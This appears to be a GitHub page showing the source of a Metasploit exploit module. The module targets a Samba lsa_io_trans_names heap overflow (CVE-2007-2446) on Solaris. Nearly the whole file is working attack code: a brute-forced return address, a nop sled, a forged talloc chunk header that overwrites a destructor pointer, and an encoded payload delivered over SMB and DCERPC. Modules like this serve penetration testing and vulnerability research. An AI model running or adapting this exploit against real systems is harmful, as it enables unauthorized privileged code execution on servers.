-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathlsa_transnames_heap_solaris.rb
212 lines (184 loc) · 5.79 KB
/
lsa_transnames_heap_solaris.rb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::DCERPC
include Msf::Exploit::Remote::SMB::Client
include Msf::Exploit::Brute
def initialize(info = {})
super(update_info(info,
'Name' => 'Samba lsa_io_trans_names Heap Overflow',
'Description' => %q{
This module triggers a heap overflow in the LSA RPC service
of the Samba daemon. This module uses the TALLOC chunk overwrite
method (credit Ramon and Adriano), which only works with Samba
versions 3.0.21-3.0.24. Additionally, this module will not work
when the Samba "log level" parameter is higher than "2".
},
'Author' =>
[
'Ramon de C Valle',
'Adriano Lima <adriano[at]risesecurity.org>',
'hdm'
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2007-2446'],
['OSVDB', '34699'],
],
'Privileged' => true,
'Payload' =>
{
'Space' => 1024,
},
'Platform' => 'solaris',
'Targets' =>
[
['Solaris 8/9/10 x86 Samba 3.0.21-3.0.24',
{
'Platform' => 'solaris',
'Arch' => [ ARCH_X86 ],
'Nops' => 64 * 1024,
'Bruteforce' =>
{
'Start' => { 'Ret' => 0x082f2000 },
'Stop' => { 'Ret' => 0x084f2000 },
'Step' => 60 * 1024,
}
}
],
['Solaris 8/9/10 SPARC Samba 3.0.21-3.0.24',
{
'Platform' => 'solaris',
'Arch' => [ ARCH_SPARC ],
'Nops' => 64 * 1024,
'Bruteforce' =>
{
'Start' => { 'Ret' => 0x00322000 },
'Stop' => { 'Ret' => 0x00722000 },
'Step' => 60 * 1024,
}
}
],
['DEBUG',
{
'Platform' => 'solaris',
'Arch' => [ ARCH_X86 ],
'Nops' => 64 * 1024,
'Bruteforce' =>
{
'Start' => { 'Ret' => 0xaabbccdd },
'Stop' => { 'Ret' => 0xaabbccdd },
'Step' => 60 * 1024,
}
}
],
],
'DisclosureDate' => '2007-05-14',
'DefaultTarget' => 0
))
register_options(
[
OptString.new('SMBPIPE', [ true, "The pipe name to use", 'LSARPC']),
])
end
# Need to perform target detection
def autofilter
false
end
def brute_exploit(target_addrs)
if(not @nops)
if (target['Nops'] > 0)
print_status("Creating nop sled....")
@nops = make_nops(target['Nops'])
else
@nops = ''
end
end
print_status("Trying to exploit Samba with address 0x%.8x..." % target_addrs['Ret'])
nops = @nops
pipe = datastore['SMBPIPE'].downcase
print_status("Connecting to the SMB service...")
connect()
smb_login()
datastore['DCERPC::fake_bind_multi'] = false
handle = dcerpc_handle('12345778-1234-abcd-ef00-0123456789ab', '0.0', 'ncacn_np', ["\\#{pipe}"])
print_status("Binding to #{handle} ...")
dcerpc_bind(handle)
print_status("Bound to #{handle} ...")
num_entries = 272
num_entries2 = 288
#
# First talloc_chunk
# 16 bits align
# 16 bits sid_name_use
# 16 bits uni_str_len
# 16 bits uni_max_len
# 32 bits buffer
# 32 bits domain_idx
#
buf = (('A' * 16) * num_entries)
# Padding
buf << 'A' * 8
# TALLOC_MAGIC
talloc_magic = "\x70\xec\x14\xe8"
# Second talloc_chunk header
buf << 'A' * 8 # next, prev
buf << NDR.long(0) + NDR.long(0) # parent, child
buf << NDR.long(0) # refs
buf << [target_addrs['Ret']].pack('V') # destructor
buf << 'A' * 4 # name
buf << 'A' * 4 # size
buf << talloc_magic # flags
stub = lsa_open_policy(dcerpc)
stub << NDR.long(0) # num_entries
stub << NDR.long(0) # ptr_sid_enum
stub << NDR.long(num_entries) # num_entries
stub << NDR.long(0x20004) # ptr_trans_names
stub << NDR.long(num_entries2) # num_entries2
stub << buf
stub << nops
stub << payload.encoded
print_status("Calling the vulnerable function...")
begin
# LsarLookupSids
dcerpc.call(0x0f, stub)
rescue Rex::Proto::DCERPC::Exceptions::NoResponse, Rex::Proto::SMB::Exceptions::NoReply, ::EOFError
print_status('Server did not respond, this is expected')
rescue Rex::Proto::DCERPC::Exceptions::Fault
print_error('Server is most likely patched...')
rescue => e
if e.to_s =~ /STATUS_PIPE_DISCONNECTED/
print_status('Server disconnected, this is expected')
else
print_error("Error: #{e.class}: #{e}")
end
end
handler
disconnect
end
def lsa_open_policy(dcerpc, server="\\")
stubdata =
# Server
NDR.uwstring(server) +
# Object Attributes
NDR.long(24) + # SIZE
NDR.long(0) + # LSPTR
NDR.long(0) + # NAME
NDR.long(0) + # ATTRS
NDR.long(0) + # SEC DES
# LSA QOS PTR
NDR.long(1) + # Referent
NDR.long(12) + # Length
NDR.long(2) + # Impersonation
NDR.long(1) + # Context Tracking
NDR.long(0) + # Effective Only
# Access Mask
NDR.long(0x02000000)
res = dcerpc.call(6, stubdata)
dcerpc.last_response.stub_data[0,20]
end
end